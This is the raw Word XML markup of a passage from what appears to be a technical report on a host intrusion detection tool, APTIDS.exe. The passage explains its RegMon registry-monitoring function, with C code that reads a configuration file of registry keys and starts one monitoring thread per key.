      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p w:rsidR="007D4BC6" w:rsidRDefault="00910D7B" w:rsidP="00910D7B">
      <w:r>
        <w:t>On running at startup, APTIDS.exe called a function named “RegMon” for performing Registry Monitoring task.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00910D7B" w:rsidRPr="007D4BC6" w:rsidRDefault="007D4BC6" w:rsidP="007D4BC6">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D4BC6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>RegMon</w:t>
      </w:r>
      <w:r w:rsidR="00910D7B" w:rsidRPr="007D4BC6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B04F7" w:rsidRDefault="00910D7B" w:rsidP="008625D0">
      <w:r>
        <w:t>RegMon firstly reads</w:t>
      </w:r>
      <w:r w:rsidR="00F77C71">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the configuration file</w:t>
      </w:r>
      <w:r w:rsidR="00F77C71">
        <w:t xml:space="preserve"> named “RegConfig.conf”,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which stores the Registry keys for monitoring. RegMon checks whether the configuration file exist or whether it does not contain null, then reads its content and store in a PCHAR variable called “lpBuffer”.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>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RegMon(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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LPCSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> szRegConfig = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"Config/RegConfig.conf"</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hFile = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CreateFileA(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">szRegConfig, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>GENERIC_READ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, 0,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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>OPEN_EXISTING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, 0,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dwErrorCode = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>GetLastError(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">dwErrorCode == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ERROR_FILE_NOT_FOUND</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"Cannot open Registry Configuration file: ERROR_FILE_NOT_FOUND !\n"</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dwResult, dwByteRead;</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lpBuffer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calloc(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_BUFFER_LEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 1);</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dwResult = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ReadFile(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">hFile, lpBuffer, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_BUFFER_LEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, &amp;dwByteRead,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0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>dwByteRead == 0){</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"Registry Configuration file contains NULL !\n"</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7D4BC6" w:rsidRDefault="007D4BC6" w:rsidP="007D4BC6">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D4BC6" w:rsidRDefault="004A4D8F" w:rsidP="007D4BC6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>RegMon generate a separate thread for monitoring each registry key read in the con</w:t>
      </w:r>
      <w:r w:rsidR="00A81747">
        <w:t xml:space="preserve">figuration file. Therefore, we </w:t>
      </w:r>
      <w:r w:rsidR="007E611D">
        <w:t>declare</w:t>
      </w:r>
      <w:r w:rsidR="00A81747">
        <w:t xml:space="preserve"> three arrays and a thread counter.</w:t>
      </w:r>
      <w:r w:rsidR="007E611D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D4BC6" w:rsidRDefault="007E611D" w:rsidP="007D4BC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">“pRegKey” array is declared for storing an array of REGKEY structs, which are used to store the registry key as argument passed to the thread function. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D4BC6" w:rsidRDefault="007E611D" w:rsidP="007D4BC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“hThreadArray” is used for storing an array of threads created the</w:t>
      </w:r>
      <w:r w:rsidR="007D4BC6">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D4BC6" w:rsidRDefault="007E611D" w:rsidP="007D4BC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“dwThreadIdArray” is used for storing thread ID numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B04F7" w:rsidRDefault="007D4BC6" w:rsidP="007D4BC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“iThread” is used for counting the number of current executing threads created by</w:t>
      </w:r>
      <w:r w:rsidR="007E611D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>RegMon.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A81747" w:rsidRDefault="00A81747" w:rsidP="003416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720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PREGKEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> pRegKey[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_REG_THREADS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A81747" w:rsidRDefault="00A81747" w:rsidP="00A81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dwThreadIdArray[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_REG_THREADS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A81747" w:rsidRDefault="00A81747" w:rsidP="00A81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hThreadArray[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_REG_THREADS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A81747" w:rsidRDefault="00A81747" w:rsidP="00A81747">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:left="0" w:firstLine="0"/>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iThread = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D4BC6" w:rsidRDefault="00C258C6" w:rsidP="00B0640C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The Reg</w:t>
      </w:r>
      <w:r w:rsidR="006B6E8A">
        <w:t xml:space="preserve">Config.conf is a configuration file using XML-like format. For reading its valuable data, we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="006B6E8A">
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006B6E8A">
        <w:t xml:space="preserve"> read between 2 tags, which is the open tag &lt;Key&gt; and the close tag &lt;/Key&gt;, and skip all line with a starting “#” character. The registry key will be monitored is the information between these 2 tags. We process the line, read between the 2 tags and find the information needed.</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while</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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pRegKey[iThread] = (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PREGKEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>) HeapAlloc(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>GetProcessHeap(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HEAP_ZERO_MEMORY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">,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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>REGKEY</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(pRegKey[iThread] == </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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ExitProcess(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>1);</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if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">strstr(lpBuffer, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"#"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">)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lpBuffer = (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>strstr(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">lpBuffer, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>) + strlen(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"\n"</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lpKeyStart </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>=  (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)strstr((</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LPCSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">)lpBuffer, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"&lt;Key&gt;"</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lpKeyEnd </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>=  (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">)strstr(lpBuffer, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"&lt;/Key&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">); </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if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">lpKeyStart ==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 lpKeyEnd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lpKeyStart += strlen(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"&lt;Key&gt;"</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pRegKey[iThread]-&gt;stlpKey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calloc(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_KEY_LEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 1);</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lpKey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calloc(</w:t>
      </w:r>
